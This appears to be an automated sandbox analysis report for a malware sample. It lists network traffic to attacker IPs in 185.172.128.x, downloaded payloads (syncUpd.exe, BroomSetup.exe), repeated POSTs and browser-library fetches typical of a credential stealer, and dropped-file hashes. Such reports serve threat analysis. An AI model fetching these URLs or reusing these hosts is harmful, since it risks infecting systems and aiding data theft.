            westus2-2.in.applicationinsights.azure.com
            SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            Remote address:
            8.8.8.8:53
            Request
            westus2-2.in.applicationinsights.azure.com
            IN A
            Response
            westus2-2.in.applicationinsights.azure.com
            IN CNAME
            westus2-2.in.ai.monitor.azure.com
            westus2-2.in.ai.monitor.azure.com
            IN CNAME
            westus2-2.in.ai.privatelink.monitor.azure.com
            westus2-2.in.ai.privatelink.monitor.azure.com
            IN CNAME
            gig-ai-prod-westus2-0.trafficmanager.net
            gig-ai-prod-westus2-0.trafficmanager.net
            IN CNAME
            gig-ai-prod-wus2-02-app-v4-tag.westus2.cloudapp.azure.com
            gig-ai-prod-wus2-02-app-v4-tag.westus2.cloudapp.azure.com
            IN A
            20.9.155.150
          • flag-us
            POST
            https://westus2-2.in.applicationinsights.azure.com/v2/track
            SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            Remote address:
            20.9.155.150:443
            Request
            POST /v2/track HTTP/1.1
            Content-Type: application/x-json-stream
            Content-Encoding: gzip
            Host: westus2-2.in.applicationinsights.azure.com
            Content-Length: 854
            Expect: 100-continue
            Connection: Keep-Alive
            Response
            HTTP/1.1 200 OK
            Transfer-Encoding: chunked
            Content-Type: application/json; charset=utf-8
            Server: Microsoft-HTTPAPI/2.0
            Strict-Transport-Security: max-age=31536000
            X-Content-Type-Options: nosniff
            Date: Fri, 10 May 2024 09:30:47 GMT
          • flag-us
            DNS
            172.210.232.199.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            172.210.232.199.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            150.155.9.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            150.155.9.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            16.173.189.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            16.173.189.20.in-addr.arpa
            IN PTR
            Response
          • 185.172.128.90:80
            http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
            http
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            390 B
             280 B
             4
            3

            HTTP Request

            GET http://185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0

            HTTP Response

            200
          • 185.172.128.228:80
            http://185.172.128.228/ping.php?substr=eight
            http
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            376 B
             279 B
             4
            3

            HTTP Request

            GET http://185.172.128.228/ping.php?substr=eight

            HTTP Response

            200
          • 185.172.128.59:80
            http://185.172.128.59/syncUpd.exe
            http
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            4.6kB
             243.1kB
             96
            184

            HTTP Request

            GET http://185.172.128.59/syncUpd.exe

            HTTP Response

            200
          • 185.172.128.228:80
            http://185.172.128.228/BroomSetup.exe
            http
            1aa2463e6b3373a1769dd41d2ed055fa045cd481100a5f06b8e241e6e3241076.exe
            96.5kB
             5.0MB
             2050
            3747

            HTTP Request

            GET http://185.172.128.228/BroomSetup.exe

            HTTP Response

            200
          • 20.157.87.45:80
            http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
            http
            u18c.1.exe
            836 B
             721 B
             6
            6

            HTTP Request

            POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashx

            HTTP Response

            200
          • 143.244.56.50:443
            https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe
            tls, http2
            2.5MB
             61.6MB
             41731
            44307

            HTTP Request

            HEAD https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

            HTTP Response

            200

            HTTP Request

            GET https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.1.11/SystemMechanic.exe

            HTTP Response

            200
          • 172.217.16.234:443
            chromewebstore.googleapis.com
            tls
            2.6kB
             7.9kB
             17
            17
          • 20.157.87.45:80
            http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
            http
            u18c.1.exe
            836 B
             657 B
             6
            6

            HTTP Request

            POST http://svc.iolo.com/__svc/sbv/DownloadManager.ashx

            HTTP Response

            200
          • 185.172.128.150:80
            http://185.172.128.150/c698e1bc8a2f5e6d.php
            http
            u18c.0.exe
            339.8kB
             5.4MB
             4185
            4092

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/sqlite3.dll

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/nss3.dll

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll

            HTTP Response

            200

            HTTP Request

            GET http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200

            HTTP Request

            POST http://185.172.128.150/c698e1bc8a2f5e6d.php

            HTTP Response

            200
          • 20.9.155.150:443
            https://westus2-2.in.applicationinsights.azure.com/v2/track
            tls, http
            SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            1.9kB
             5.2kB
             9
            9

            HTTP Request

            POST https://westus2-2.in.applicationinsights.azure.com/v2/track

            HTTP Response

            200
          • 8.8.8.8:53
            104.219.191.52.in-addr.arpa
            dns
            73 B
             147 B
             1
            1

            DNS Request

            104.219.191.52.in-addr.arpa

          • 8.8.8.8:53
            79.190.18.2.in-addr.arpa
            dns
            70 B
             133 B
             1
            1

            DNS Request

            79.190.18.2.in-addr.arpa

          • 8.8.8.8:53
            76.32.126.40.in-addr.arpa
            dns
            71 B
             157 B
             1
            1

            DNS Request

            76.32.126.40.in-addr.arpa

          • 8.8.8.8:53
            95.221.229.192.in-addr.arpa
            dns
            73 B
             144 B
             1
            1

            DNS Request

            95.221.229.192.in-addr.arpa

          • 8.8.8.8:53
            183.142.211.20.in-addr.arpa
            dns
            73 B
             159 B
             1
            1

            DNS Request

            183.142.211.20.in-addr.arpa

          • 8.8.8.8:53
            196.249.167.52.in-addr.arpa
            dns
            73 B
             147 B
             1
            1

            DNS Request

            196.249.167.52.in-addr.arpa

          • 8.8.8.8:53
            241.150.49.20.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            241.150.49.20.in-addr.arpa

          • 8.8.8.8:53
            103.169.127.40.in-addr.arpa
            dns
            73 B
             147 B
             1
            1

            DNS Request

            103.169.127.40.in-addr.arpa

          • 8.8.8.8:53
            90.128.172.185.in-addr.arpa
            dns
            73 B
             73 B
             1
            1

            DNS Request

            90.128.172.185.in-addr.arpa

          • 8.8.8.8:53
            171.39.242.20.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            171.39.242.20.in-addr.arpa

          • 8.8.8.8:53
            142.53.16.96.in-addr.arpa
            dns
            71 B
             135 B
             1
            1

            DNS Request

            142.53.16.96.in-addr.arpa

          • 8.8.8.8:53
            228.128.172.185.in-addr.arpa
            dns
            74 B
             74 B
             1
            1

            DNS Request

            228.128.172.185.in-addr.arpa

          • 8.8.8.8:53
            59.128.172.185.in-addr.arpa
            dns
            73 B
             73 B
             1
            1

            DNS Request

            59.128.172.185.in-addr.arpa

          • 8.8.8.8:53
            svc.iolo.com
            dns
            u18c.1.exe
            58 B
             74 B
             1
            1

            DNS Request

            svc.iolo.com

            DNS Response

            20.157.87.45

          • 8.8.8.8:53
            45.87.157.20.in-addr.arpa
            dns
            71 B
             157 B
             1
            1

            DNS Request

            45.87.157.20.in-addr.arpa

          • 8.8.8.8:53
            download.iolo.net
            dns
            63 B
             105 B
             1
            1

            DNS Request

            download.iolo.net

            DNS Response

            143.244.56.50

          • 8.8.8.8:53
            50.56.244.143.in-addr.arpa
            dns
            72 B
             114 B
             1
            1

            DNS Request

            50.56.244.143.in-addr.arpa

          • 8.8.8.8:53
            chromewebstore.googleapis.com
            dns
            75 B
             299 B
             1
            1

            DNS Request

            chromewebstore.googleapis.com

            DNS Response

            172.217.16.234
            142.250.200.10
            142.250.200.42
            216.58.201.106
            216.58.204.74
            172.217.169.10
            216.58.212.202
            172.217.169.74
            172.217.169.42
            142.250.179.234
            142.250.180.10
            142.250.187.202
            142.250.187.234
            142.250.178.10

          • 8.8.8.8:53
            chromewebstore.googleapis.com
            dns
            75 B
             132 B
             1
            1

            DNS Request

            chromewebstore.googleapis.com

          • 8.8.8.8:53
            234.16.217.172.in-addr.arpa
            dns
            73 B
             142 B
             1
            1

            DNS Request

            234.16.217.172.in-addr.arpa

          • 8.8.8.8:53
            36.56.20.217.in-addr.arpa
            dns
            71 B
             131 B
             1
            1

            DNS Request

            36.56.20.217.in-addr.arpa

          • 8.8.8.8:53
            150.128.172.185.in-addr.arpa
            dns
            74 B
             74 B
             1
            1

            DNS Request

            150.128.172.185.in-addr.arpa

          • 8.8.8.8:53
            westus2-2.in.applicationinsights.azure.com
            dns
            SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            88 B
             300 B
             1
            1

            DNS Request

            westus2-2.in.applicationinsights.azure.com

            DNS Response

            20.9.155.150

          • 8.8.8.8:53
            172.210.232.199.in-addr.arpa
            dns
            74 B
             128 B
             1
            1

            DNS Request

            172.210.232.199.in-addr.arpa

          • 8.8.8.8:53
            150.155.9.20.in-addr.arpa
            dns
            71 B
             157 B
             1
            1

            DNS Request

            150.155.9.20.in-addr.arpa

          • 8.8.8.8:53
            16.173.189.20.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            16.173.189.20.in-addr.arpa

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\Are.docx
            Filesize

            11KB

            MD5

            a33e5b189842c5867f46566bdbf7a095

            SHA1

            e1c06359f6a76da90d19e8fd95e79c832edb3196

            SHA256

            5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

            SHA512

            f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

            Download Submit

          • C:\ProgramData\mozglue.dll
            Filesize

            593KB

            MD5

            c8fd9be83bc728cc04beffafc2907fe9

            SHA1

            95ab9f701e0024cedfbd312bcfe4e726744c4f2e

            SHA256

            ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

            SHA512

            fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

            Download Submit

          • C:\ProgramData\nss3.dll
            Filesize

            2.0MB

            MD5

            1cc453cdf74f31e4d913ff9c10acdde2

            SHA1

            6e85eae544d6e965f15fa5c39700fa7202f3aafe

            SHA256

            ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

            SHA512

            dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
            Filesize

            2B

            MD5

            d751713988987e9331980363e24189ce

            SHA1

            97d170e1550eee4afc0af065b78cda302a97674c

            SHA256

            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

            SHA512

            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

            Download Submit

          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
            Filesize

            40B

            MD5

            20d4b8fa017a12a108c87f540836e250

            SHA1

            1ac617fac131262b6d3ce1f52f5907e31d5f6f00

            SHA256

            6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

            SHA512

            507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
            Filesize

            2KB

            MD5

            8c495c795c53d741fe959895322be606

            SHA1

            45a67386853ba30e37ac1ad62cf7e894f6016ac0

            SHA256

            dedd1144f3fcf89ecd5200790879f72f3a1f32672fff0e415cfe343a7e64d710

            SHA512

            3c65504ce99bfd7aacb19dbfeae532b700987d1afbc93a71dc3b5fe651ab7d53fea5cb8c55ebcb37b4b928030f855af73de07c34e8ee52e095a4a8f2f9b599f5

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
            Filesize

            3KB

            MD5

            467ee0a0fa395f6400fa0fa13a6ad487

            SHA1

            ba838f6a895ae57a25c03de98e9ceac185ae0caf

            SHA256

            22d550b67d89efe4fe79741252f4bd5c22a985bf17bedead6ae5460dbb839b6a

            SHA512

            99f732824a2f2796760329853f6449363d4a63df7792944ac7d04aa785aa8b5a05d719f88007d337a9323ddf83fe0460763a0691c0b0d8aec420e2fec1ed0510

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\u18c.0.exe
            Filesize

            230KB

            MD5

            cb0f143b280b0c05a99a0f3e8738b677

            SHA1

            1bccf20abd6596cd529764d64de49246478423a5

            SHA256

            d8a59077be36b67679feb9e8f1df536378f2caf9be5e0d8abad95453d8589c79

            SHA512

            a57a0313ecd220540153fad20b96fb8ae61f62cb34fa9c35b4a93df693bf9fc8f55c7e50342603e86ece4ceae68ac86f1cadb61754bd787cf3b32aa085cd867b

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\u18c.1.exe
            Filesize

            4.6MB

            MD5

            397926927bca55be4a77839b1c44de6e

            SHA1

            e10f3434ef3021c399dbba047832f02b3c898dbd

            SHA256

            4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7

            SHA512

            cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

            Download Submit

          • memory/1596-13-0x0000000000400000-0x0000000002599000-memory.dmp

            Filesize

            33.6MB

            Download

          • memory/1596-34-0x0000000000400000-0x0000000002599000-memory.dmp

            Filesize

            33.6MB

            Download

          • memory/1596-35-0x00000000041B0000-0x000000000421C000-memory.dmp

            Filesize

            432KB

            Download

          • memory/1596-36-0x0000000000400000-0x000000000046F000-memory.dmp

            Filesize

            444KB

            Download

          • memory/1596-1-0x00000000025C0000-0x00000000026C0000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/1596-4-0x0000000000400000-0x0000000002599000-memory.dmp

            Filesize

            33.6MB

            Download

          • memory/1596-3-0x0000000000400000-0x000000000046F000-memory.dmp

            Filesize

            444KB

            Download

          • memory/1596-2-0x00000000041B0000-0x000000000421C000-memory.dmp

            Filesize

            432KB

            Download

          • memory/2120-171-0x0000000000400000-0x0000000002575000-memory.dmp

            Filesize

            33.5MB

            Download

          • memory/2120-133-0x0000000000400000-0x0000000002575000-memory.dmp

            Filesize

            33.5MB

            Download

          • memory/2120-93-0x0000000061E00000-0x0000000061EF3000-memory.dmp

            Filesize

            972KB

            Download

          • memory/4636-53-0x0000000000400000-0x00000000008AD000-memory.dmp

            Filesize

            4.7MB

            Download

          • memory/4636-64-0x0000000000400000-0x00000000008AD000-memory.dmp

            Filesize

            4.7MB

            Download

          • memory/4968-73-0x00000170344E0000-0x000001703450A000-memory.dmp

            Filesize

            168KB

            Download

          • memory/4968-88-0x0000017039830000-0x0000017039852000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4968-75-0x00000170345B0000-0x00000170345D2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/4968-76-0x0000017033DF0000-0x0000017033DFA000-memory.dmp

            Filesize

            40KB

            Download

          • memory/4968-80-0x00000170345E0000-0x00000170348E0000-memory.dmp

            Filesize

            3.0MB

            Download

          • memory/4968-82-0x0000017038FE0000-0x0000017038FE8000-memory.dmp

            Filesize

            32KB

            Download

          • memory/4968-83-0x0000017038960000-0x0000017038998000-memory.dmp

            Filesize

            224KB

            Download

          • memory/4968-84-0x0000017038930000-0x000001703893E000-memory.dmp

            Filesize

            56KB

            Download

          • memory/4968-85-0x0000017038950000-0x0000017038958000-memory.dmp

            Filesize

            32KB

            Download

          • memory/4968-86-0x0000017039800000-0x000001703980A000-memory.dmp

            Filesize

            40KB

            Download

          • memory/4968-87-0x0000017039AB0000-0x0000017039B12000-memory.dmp

            Filesize

            392KB

            Download

          • memory/4968-74-0x0000017034560000-0x00000170345B0000-memory.dmp

            Filesize

            320KB

            Download

          • memory/4968-89-0x000001703A040000-0x000001703A568000-memory.dmp

            Filesize

            5.2MB

            Download

          • memory/4968-92-0x0000017039810000-0x000001703981C000-memory.dmp

            Filesize

            48KB

            Download

          • memory/4968-72-0x00000170341C0000-0x0000017034272000-memory.dmp

            Filesize

            712KB

            Download

          • memory/4968-116-0x0000017039920000-0x0000017039996000-memory.dmp

            Filesize

            472KB

            Download

          • memory/4968-71-0x00000170341A0000-0x00000170341AA000-memory.dmp

            Filesize

            40KB

            Download

          • memory/4968-70-0x0000017033E70000-0x0000017033E94000-memory.dmp

            Filesize

            144KB

            Download

          • memory/4968-69-0x000001701B710000-0x000001701B724000-memory.dmp

            Filesize

            80KB

            Download

          • memory/4968-68-0x0000017033E10000-0x0000017033E1C000-memory.dmp

            Filesize

            48KB

            Download

          • memory/4968-67-0x0000017019DA0000-0x0000017019DB0000-memory.dmp

            Filesize

            64KB

            Download

          • memory/4968-66-0x0000017034280000-0x000001703438A000-memory.dmp

            Filesize

            1.0MB

            Download

          • memory/4968-172-0x0000017034B00000-0x0000017034B1E000-memory.dmp

            Filesize

            120KB

            Download

          • memory/4968-65-0x0000017016150000-0x0000017019984000-memory.dmp

            Filesize

            56.2MB

            Download

          We care about your privacy.

          This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.